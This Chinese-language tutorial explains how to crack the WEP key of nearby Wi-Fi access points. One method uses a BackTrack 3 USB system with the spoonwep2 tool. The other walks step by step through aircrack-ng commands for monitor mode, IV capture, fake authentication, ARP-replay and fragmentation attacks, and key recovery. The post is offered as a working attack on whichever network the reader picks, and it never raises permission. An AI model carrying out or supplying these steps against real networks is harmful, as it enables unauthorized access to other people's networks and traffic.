用Interl 5100AGN 无线网卡破解无线网络WEP密码

在这里我使用两种方法破解无线网络WEP密码：工具破解和命令行破解。
1、使用霸天虎Mini-BT3.6.1
      下载霸天虎Mini－BT 3.6.1.ISO, 解压后，将boot、slax文件夹拷贝到已格式化的U盘中，在cmd提示符下输入U盘盘符，转到U盘目录下，再输入cd boot，接着输入bootinst，根据提示，一路按任意键即可，很快就将BT3系统安装到u盘了。
      重启电脑，设置系统从U盘启动，进入系统后，开一个shell（在开始菜单右边），输入 airmon-ng start wlan0，这一步是打开网卡的监听模式。
     启动spoonwep2破解工具（桌面上有在),窗口中有3个下拉选择框，第一个选上一步得知的mon0,第二个选normall,第三个选unknown victim,然后点next.
     点击右上角的Lunch按钮，开始扫描周围的ap信号。
     选择扫描出来的你想要破解的ap，一般要等Data值有了再点seletion ok 按钮。
     在弹出的窗口中，有两个下拉框，第一个选二三四中模式中的一个，我选的是第二种模式，第二个下拉框中选第一个模式即可。然后点击Lunch，就开始破解了，一会就会看到窗口下方的数据开始增长了，刚开始可能比较慢，到后面会很快的，耐心等待，直到KEY FOUND，可能时间比较长，这和你所在位置的信号强度有关。注意破解的密码不含中括号和冒号。
2.在Ubuntu9.04下使用命令行破解
      打开几个shell依此使用以下几个命令，很快就会破解。
      1、sudo airmon-ng start wlan0
      2、sudo airodump-ng -w 文件名 --ivs --channel 频道号 mon0
           这一步是在mon0上打开监控台，“文件名”可以任意取，“频道号”是你要监听  的频道，也可以不要这一项。
      3、sudo aireplay-ng -1 0 -a AP的MAC地址 －h 本机的MAC地址 mon0
           这一步是建立网卡与待破解ap的伪连接，如果成功会提示连接成功。
      4、sudo aireplay-ng -3 -b -a AP的MAC地址 －h 本机的MAC地址 mon0
           这一步是对待破解AP进行-3 ARP攻击
      5、sudo aireplay-ng -5 -b -a AP的MAC地址 －h 本机的MAC地址 mon0
           这一步是进行抓包分析，主要是对－3进行辅助，我试过，如果没有这一步的话－3直接成功很困难。这一步运行不久后会提示你yes还是no，一律选yes后回车，会多次提示你，不管它，每次都选yes就行，直到步骤4狂刷屏与步骤2中的date值暴涨为止就可以不用管这一步了。
      6、sudo aircrack-ng *.ivs （ *前有空格）
           这一步是破解当前所有ivs文件，在出来的选项里选择待破解的AP对应的序号即可，很快密码就会出来。